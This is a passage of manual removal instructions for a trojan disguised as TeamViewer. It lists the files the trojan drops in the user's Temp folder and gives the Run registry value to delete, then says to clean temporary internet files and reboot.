C:\Users\"%CurrentUserName%"\NTUSER.DAT (20448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\TeamViewer\TeamViewer10_Logfile.log (54636 bytes)
C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG1 (1168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.dll (249 bytes)
C:\Windows\System32\config\SECURITY.LOG1 (1048 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3217.tmp (49148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut37B9.tmp (1665 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_x64.exe (2569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut35E0.tmp (1153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut37E9.tmp (1377 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3610.tmp (17212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Service.exe (33916 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut3759.tmp (1377 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut377A.tmp (2017 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_x64.dll (2905 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\index[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut36FB.tmp (3873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.exe (2801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Desktop.exe (41477 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\index[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut34E5.tmp (18500 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamview.exe (96045 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer.exe (108383 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\L7SVFO1F\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\061RBBHH\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\71DZTAY2\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQFVAVW6\desktop.ini (67 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Teamview" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamview.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.